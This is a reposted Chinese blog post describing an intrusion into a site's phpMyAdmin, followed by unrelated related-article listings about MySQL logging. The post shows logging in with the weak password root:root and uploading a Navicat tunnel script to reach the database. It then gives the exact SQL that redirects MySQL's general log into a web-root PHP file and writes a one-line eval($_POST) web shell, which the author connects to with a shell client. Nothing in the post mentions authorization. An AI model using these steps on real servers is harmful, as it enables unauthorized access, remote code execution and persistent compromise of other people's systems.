Phpmyadmin的一次渗透测试

最新推荐文章于 2021-01-18 21:05:13 发布
最新推荐文章于 2021-01-18 21:05:13 发布
阅读量664 收藏 2
点赞数 1
文章标签: php 数据库
原文链接:http://www.cnblogs.com/someone9/p/10987419.html
版权

首先通过目录扫描对某站进行扫描,发现存在phpmyadmin,尝试弱口令root:root很幸运进去了

 

尝试使用Navicate进行数据库连接返回禁止远程连接数据库:

 

但是远程命令执行发现本地3306端口时开放的,于是尝试通过代理进行连接:

Navicat安装目录下上传ntunnel_mysql.php文件(数据库的代理脚本)到目标服务器任意web站点目录(后面getshell后上传的)

上传到D:/phpStudy/WWW目录进行访问http://XXX/ntunnel_mysql.php 测试成功

进行测试连接:

  (此时,在本地打开Navicat配置http连接,这里的通道地址就写你上面访问的那个url,说白点儿就是个代理端,勾上使用base64编码,防止waf从中作祟,然后主机名写localhost,账号密码写lnmp01本地数据库用户的账号即可,因为要连接lnmp01本地的mysql)

 

 
Phpmyadmin Get Shell:

利用日志文件

mysql 5.0版本以上会创建日志文件,修改日志的全局变量,也可以getshell。但是也要对生成的日志有可读可写的权限。

set global general_log = "ON";   #当开启general时,所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件那么,如果修改general_log_file的值,那么所执行的sql语句就会对应生成进而getshell
SET global general_log_file='D:/phpStudy/WWW/test1234.php';  #对应就会生成test1234.php文件
select '<?php eval($_POST[2019]);?>';          #将一句话木马写入test1234.php文件

菜刀连接:

转载于:https://www.cnblogs.com/someone9/p/10987419.html

weixin_30715523
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
window下mysql5.7日志的记录
qq_35476379的博客
06-11 3162
近来接触mysql日志,通过查看别人的分享进行学习,对自己过程做简单的总结,非原创,只是自己的一个记录。 我用的是window10 ,mysql 5.7.17版本 开始了。 通过 我的电脑 --> 管理 -->服务和应用程序--> 服务 ,找到mysql服务,右键属性可看到, 后面 --defaults-file= 才是my.ini 的路径,刚开始我都是在mysql...
windows中设置mysql日志输出路径的方法
lutghj1990的博客
01-14 2014
1.找到 D:\MySQL\my.ini 文件。 2.打开此文件,找到[mysqld]行,在此行下加入如下代码: # Log to file log=mySQL.log 最终效果: [mysqld] # The TCP/IP Port the MySQL Server will listen on port=3306 # Log to file log=mySQL
windows mysql 日志_Windows系统如何设置MySQL日志
weixin_36227730的博客
01-18 194
如何开启windowsmysql日志与查询功能?请看本文吧。修改 my.ini文件加入以下语句(在没有设置的前提下)log-error=d:/log/mysql/mysql_log_err.txtlog=d:/log/mysql/mysql_log.txt#log-bin=d:/log/mysql/mysql_log_binlog-slow-queries= d:/log/mysql/mysql_...
mysql换日志目录
junqing124的专栏
03-31 650
service mysql stop mv 这里移动日志目录 然后检查从库,如果发现如下错误: Got fatal error 1236 from master when reading data from binary log: 'Could not find first log file name in binary log index file' 那是因为找不到下一个日志的位置 可
vulhub渗透测试靶机学习1
08-08
80端口是一个博客网站,通过nikto扫描发现phpMyAdmin目录。通过对源代码的分析,找到Gallarific、Generator等信息,可能存在SQL注入漏洞。利用sqlmap工具进行验证,确实存在注入漏洞,可以进一步利用这些漏洞进行...
一次HW目标测试1
08-03
在本次的“HW目标测试1”中,主要涉及了网络安全领域的渗透测试技术,特别是针对Web应用的安全漏洞利用。以下是对测试过程的详细说明: 首先,测试人员通过弱口令(adminqwe123)成功登录到了后台系统,这是一个...
WEB渗透测试平台
07-06
提取码:dm1v ... DVWA multilidae MCIR sqli-labs pikachu BWVS btslab xssplatform phpMyAdmin blueLotus 推荐书籍 各种参考详细书目。 因涉及产权以上仅提供WEB测试平台,书籍不提供。 有问题请留言。
phpMyAdmin-PHP
06-25
phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的...phpMyAdmin是一个非常受欢迎的基于web的MySQL数据库管理工具。它能够创建和删除数据库,创建/删除/修改表格,删除/编辑/新增字段,执行SQL脚本等。
phpMyAdmin
08-18
phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具。phpMyAdmin 可以管理整个MySQL服务器(需要超级用户),也可以管理单个数据库。为了实现后一种,你将
开启MySQL的binlog日志
热门推荐
happyfly的博客
07-08 12万+
binlog 就是binary log,二进制日志文件,这个文件记录了mysql所有的dml操作。通过binlog日志我们可以做数据恢复,做主住复制和主从复制等等。对于开发者可能对binlog并不怎么关注,但是对于运维或者架构人员来讲是非常重要的。 如何开启mysql的binlog日志呢? 在my.inf主配置文件中直接添加三行 log_bin=ON log_bin_basenam
mysql5.7的日志管理(错误日志,二进制日志,GTID,慢日志,备份)
weixin_43467062的博客
07-28 1451
1.错误日志 1.1 配置方法 默认:开启状态,/数据存放文件/错误日志.err 查看数据 select @@datadir; ls -l /错误日志地方 定制 方法: 1.vim /etc/my.cnf log_error=/tmp/mysql.log 说明:日志目录必须得提前有,且mysql有权限写入 2.重启 /etc/init.d/mysqld restart 1.2 怎么看错误日志 vim /错误日志位置 [error] 2.binlog二进制日志 作用:(差不多=sql层的行为) 主
mysql5.7开启慢查询日志(windows系统+linux系统)
ywyngq的博客
08-19 1305
MySql提供慢SQL日志的功能,能够记录下响应时间超过一定阈值的SQL查询,以便于我们定位糟糕的查询语句。 首先,查询当前mysql数据库是否开启了慢查询日志功能: mysql -uroot -p ****** show VARIABLES like '%slow%'; slow_query_log的值是ON,代表当前数据库已经开启了慢查询功能。slow_query_log_file表...
mysql 的错误日志在哪里
codechelle的博客
01-10 8万+
https://zhidao.baidu.com/question/623835136776873524.html 如果你什么都没改过,如果是windows下,一般是安装目录下的data目录下 扩展名是.err那个文件,你可以打开安装目录下的my.ini文件检查一下如果是linux下,一般是/var/log/mysqld.log,你最好用cat /etc/my.cnf看看 http
08MySQL 中的日志文件
greatwind的博客
09-21 1820
MySQL 中的日志文件错误日志中继日志普通查询日志慢查询日志二进制日志 MySQL 中有六种日志文件,分别是二进制日志(binary log)、错误日志(error log)、慢查询日志(slow query log)、通用查询日志(general query log)、中继日志(relay log)、元数据日志(metadata log),这些日志文件在数据库中各司其职。 错误日志 错误日志是用来记录 MySQL 服务器在启动、停止和运行过程中发生任何严重警告和错误的信息。 查看错误日志的位置: SHO
MySQL5.7在线开启/关闭GTID
weixin_34015566的博客
10-25 607
MySQL5.7在线开启/关闭GTID环境介绍Part1:写在最前截止本文撰写当日,MySQL5.7.16是官网的最新稳定版,本文将用MySQL5.7.16来进行演示。从MySQL5.6开始,支持了GTID复制模式,这种模式其实是把双刃剑,虽然容易搭建主从复制了,但使用不当,就容易出现一些错误,例如error 1236。在MySQL5.6如果开启GTID模式,需要在my.cnf中加入以下几个参数:...
Centos7下修改MySQL5.7数据库文件存放路径过程--绝对原创和有效
zgrjkflmkyc的专栏
04-18 3355
1 测试环境搭建 1.1 安装操作系统Centos7 1.2 安装Mysql ######################## 安装Mysql ######################## [root@localhost home]# wget -i -c http://dev.mysql.com/get/mysql57-community-release-el7-10.noar...
适合新手渗透测试的字典
最新发布
06-12
对于新手来说,以下这些字典是比较适合的: 1. 弱口令字典:这是一个包含了常见弱口令的字典,可以用来测试系统是否存在弱口令。...需要注意的是,在使用字典进行渗透测试时,要遵守法律法规,不得进行非法攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值